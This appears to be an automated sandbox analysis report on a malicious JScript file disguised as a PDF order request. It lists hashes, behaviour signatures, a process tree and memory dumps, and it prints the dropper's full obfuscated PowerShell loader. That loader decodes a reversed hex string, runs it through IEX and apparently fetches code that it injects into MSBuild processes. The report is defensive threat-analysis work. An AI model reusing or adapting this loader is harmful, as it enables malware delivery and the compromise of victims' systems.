b2ab955ce80ce28915ebb5297029cc9fd65720b5aec3b56840f8e93f3b6c1379

General

Target

FIRST ORDER REQUEST FOR THE YEAR-pdf.JS
Size

2KB
MD5

c6fabd3d94e10f14a551b82b0fea4f55
SHA1

e534c526d89b470dca1d29a7b8b54ae65286ab26
SHA256

b2ab955ce80ce28915ebb5297029cc9fd65720b5aec3b56840f8e93f3b6c1379
SHA512

34451f45717f468eec0f8b764c2f013bb5a1fbbe68c1c264144dec79af8abbfa2cf6e83c0a0c4888b68317e0d6ed492b698c041ae771e1385282049569214c20

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

7 1584 powershell.exe
8 1584 powershell.exe
10 1584 powershell.exe

flow	pid	process
7	1584	powershell.exe
8	1584	powershell.exe
10	1584	powershell.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exe

pid	process
1584	powershell.exe
1584	powershell.exe
1584	powershell.exe
1584	powershell.exe
1584	powershell.exe
1584	powershell.exe
1584	powershell.exe
1584	powershell.exe
1584	powershell.exe
1584	powershell.exe
1584	powershell.exe
1584	powershell.exe

Suspicious use of AdjustPrivilegeToken 41 IoCs

Processes:

powershell.exe

description	pid	process
Token: SeDebugPrivilege	1584	powershell.exe
Token: SeIncreaseQuotaPrivilege	1584	powershell.exe
Token: SeSecurityPrivilege	1584	powershell.exe
Token: SeTakeOwnershipPrivilege	1584	powershell.exe
Token: SeLoadDriverPrivilege	1584	powershell.exe
Token: SeSystemProfilePrivilege	1584	powershell.exe
Token: SeSystemtimePrivilege	1584	powershell.exe
Token: SeProfSingleProcessPrivilege	1584	powershell.exe
Token: SeIncBasePriorityPrivilege	1584	powershell.exe
Token: SeCreatePagefilePrivilege	1584	powershell.exe
Token: SeBackupPrivilege	1584	powershell.exe
Token: SeRestorePrivilege	1584	powershell.exe
Token: SeShutdownPrivilege	1584	powershell.exe
Token: SeDebugPrivilege	1584	powershell.exe
Token: SeSystemEnvironmentPrivilege	1584	powershell.exe
Token: SeRemoteShutdownPrivilege	1584	powershell.exe
Token: SeUndockPrivilege	1584	powershell.exe
Token: SeManageVolumePrivilege	1584	powershell.exe
Token: 33	1584	powershell.exe
Token: 34	1584	powershell.exe
Token: 35	1584	powershell.exe
Token: SeIncreaseQuotaPrivilege	1584	powershell.exe
Token: SeSecurityPrivilege	1584	powershell.exe
Token: SeTakeOwnershipPrivilege	1584	powershell.exe
Token: SeLoadDriverPrivilege	1584	powershell.exe
Token: SeSystemProfilePrivilege	1584	powershell.exe
Token: SeSystemtimePrivilege	1584	powershell.exe
Token: SeProfSingleProcessPrivilege	1584	powershell.exe
Token: SeIncBasePriorityPrivilege	1584	powershell.exe
Token: SeCreatePagefilePrivilege	1584	powershell.exe
Token: SeBackupPrivilege	1584	powershell.exe
Token: SeRestorePrivilege	1584	powershell.exe
Token: SeShutdownPrivilege	1584	powershell.exe
Token: SeDebugPrivilege	1584	powershell.exe
Token: SeSystemEnvironmentPrivilege	1584	powershell.exe
Token: SeRemoteShutdownPrivilege	1584	powershell.exe
Token: SeUndockPrivilege	1584	powershell.exe
Token: SeManageVolumePrivilege	1584	powershell.exe
Token: 33	1584	powershell.exe
Token: 34	1584	powershell.exe
Token: 35	1584	powershell.exe

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

WScript.exepowershell.exe

description	pid	process	target process
PID 1068 wrote to memory of 1584	1068	WScript.exe	powershell.exe
PID 1068 wrote to memory of 1584	1068	WScript.exe	powershell.exe
PID 1068 wrote to memory of 1584	1068	WScript.exe	powershell.exe
PID 1584 wrote to memory of 840	1584	powershell.exe	MSBuild.exe
PID 1584 wrote to memory of 840	1584	powershell.exe	MSBuild.exe
PID 1584 wrote to memory of 840	1584	powershell.exe	MSBuild.exe
PID 1584 wrote to memory of 840	1584	powershell.exe	MSBuild.exe
PID 1584 wrote to memory of 1512	1584	powershell.exe	MSBuild.exe
PID 1584 wrote to memory of 1512	1584	powershell.exe	MSBuild.exe
PID 1584 wrote to memory of 1512	1584	powershell.exe	MSBuild.exe
PID 1584 wrote to memory of 1512	1584	powershell.exe	MSBuild.exe
PID 1584 wrote to memory of 1344	1584	powershell.exe	MSBuild.exe
PID 1584 wrote to memory of 1344	1584	powershell.exe	MSBuild.exe
PID 1584 wrote to memory of 1344	1584	powershell.exe	MSBuild.exe
PID 1584 wrote to memory of 1344	1584	powershell.exe	MSBuild.exe
PID 1584 wrote to memory of 672	1584	powershell.exe	MSBuild.exe
PID 1584 wrote to memory of 672	1584	powershell.exe	MSBuild.exe
PID 1584 wrote to memory of 672	1584	powershell.exe	MSBuild.exe
PID 1584 wrote to memory of 672	1584	powershell.exe	MSBuild.exe
PID 1584 wrote to memory of 620	1584	powershell.exe	MSBuild.exe
PID 1584 wrote to memory of 620	1584	powershell.exe	MSBuild.exe
PID 1584 wrote to memory of 620	1584	powershell.exe	MSBuild.exe
PID 1584 wrote to memory of 620	1584	powershell.exe	MSBuild.exe

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\FIRST ORDER REQUEST FOR THE YEAR-pdf.JS"
1⤵
- Suspicious use of WriteProcessMemory
PID:1068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $WBzmJ='D4#C7#72#72#02#E6#96#F6#A6#D2#02#37#27#16#86#34#96#96#36#37#16#42#02#D3#76#E6#96#27#47#35#96#96#36#37#16#42#B3#D7#22#F5#42#87#03#22#D5#56#47#97#26#B5#D5#27#16#86#36#B5#B7#02#47#36#56#A6#26#F4#D2#86#36#16#54#27#F6#64#C7#02#92#72#E5#72#82#47#96#C6#07#37#E2#67#D6#42#02#D3#37#27#16#86#34#96#96#36#37#16#42#B3#92#72#76#07#A6#E2#23#B4#F2#27#16#E2#D6#F6#36#E2#37#56#C6#26#56#57#D6#27#16#36#96#67#F2#F2#A3#07#47#47#86#72#C2#46#F6#86#47#56#D4#A3#A3#D5#56#07#97#45#C6#C6#16#34#E2#36#96#37#16#24#C6#16#57#37#96#65#E2#47#66#F6#37#F6#27#36#96#D4#B5#C2#72#76#E6#96#27#47#72#02#B2#02#72#35#46#16#72#02#B2#02#72#F6#C6#E6#72#02#B2#02#72#77#F6#44#72#C2#97#47#47#42#82#56#D6#16#E6#97#24#C6#C6#16#34#A3#A3#D5#E6#F6#96#47#36#16#27#56#47#E6#94#E2#36#96#37#16#24#C6#16#57#37#96#65#E2#47#66#F6#37#F6#27#36#96#D4#B5#02#D3#67#D6#42#B3#92#72#36#96#37#16#24#C6#16#57#37#96#65#E2#47#66#F6#37#F6#27#36#96#D4#72#82#56#D6#16#E4#C6#16#96#47#27#16#05#86#47#96#75#46#16#F6#C4#A3#A3#D5#97#C6#26#D6#56#37#37#14#E2#E6#F6#96#47#36#56#C6#66#56#25#E2#D6#56#47#37#97#35#B5#02#D5#46#96#F6#67#B5#B3#D4#C7#72#92#47#E6#56#72#B2#72#96#C6#34#26#72#B2#72#56#75#E2#47#72#B2#72#56#E4#02#47#36#72#B2#72#56#A6#26#F4#72#B2#72#D2#77#56#E4#82#72#D3#97#47#47#42#B3#23#23#07#42#02#D3#02#C6#F6#36#F6#47#F6#27#05#97#47#96#27#57#36#56#35#A3#A3#D5#27#56#76#16#E6#16#D4#47#E6#96#F6#05#56#36#96#67#27#56#35#E2#47#56#E4#E2#D6#56#47#37#97#35#B5#B3#92#23#73#03#33#02#C2#D5#56#07#97#45#C6#F6#36#F6#47#F6#27#05#97#47#96#27#57#36#56#35#E2#47#56#E4#E2#D6#56#47#37#97#35#B5#82#47#36#56#A6#26#F4#F6#45#A3#A3#D5#D6#57#E6#54#B5#02#D3#02#23#23#07#42#B3#92#76#E6#96#07#42#82#02#C6#96#47#E6#57#02#D7#47#56#96#57#15#D2#02#13#02#47#E6#57#F6#36#D2#02#D6#F6#36#E2#56#C6#76#F6#F6#76#02#07#D6#F6#36#D2#02#E6#F6#96#47#36#56#E6#E6#F6#36#D2#47#37#56#47#02#D3#02#76#E6#96#07#42#B7#02#F6#46#B3#56#E6#F6#26#45#42#02#D4#02#C6#16#37#B3#92#72#94#72#C2#72#E3#72#82#56#36#16#C6#07#56#27#E2#72#85#54#E3#72#D3#56#E6#F6#26#45#42';$text =$WBzmJ.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('#') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1584

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
3⤵
PID:840

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
3⤵
PID:620

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
3⤵
PID:672

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
3⤵
PID:1344

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
3⤵
PID:1512

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1068-3-0x00000000025B0000-0x00000000025B4000-memory.dmp

Filesize
16KB

Download
memory/1584-2-0x0000000000000000-mapping.dmp

Download
memory/1584-4-0x000007FEF6080000-0x000007FEF6A6C000-memory.dmp

Filesize
9.9MB

Download
memory/1584-5-0x00000000024A0000-0x00000000024A1000-memory.dmp

Filesize
4KB

Download
memory/1584-6-0x000000001AD20000-0x000000001AD21000-memory.dmp

Filesize
4KB

Download
memory/1584-7-0x0000000002550000-0x0000000002551000-memory.dmp

Filesize
4KB

Download
memory/1584-8-0x0000000001FA0000-0x0000000001FA1000-memory.dmp

Filesize
4KB

Download
memory/1584-9-0x000000001C4C0000-0x000000001C4C1000-memory.dmp

Filesize
4KB

Download
memory/1584-10-0x000000001C650000-0x000000001C651000-memory.dmp

Filesize
4KB

Download
memory/1584-11-0x000000001AB20000-0x000000001AB28000-memory.dmp

Filesize
32KB

Download
memory/1584-12-0x000000001B7F0000-0x000000001B7F6000-memory.dmp

Filesize
24KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads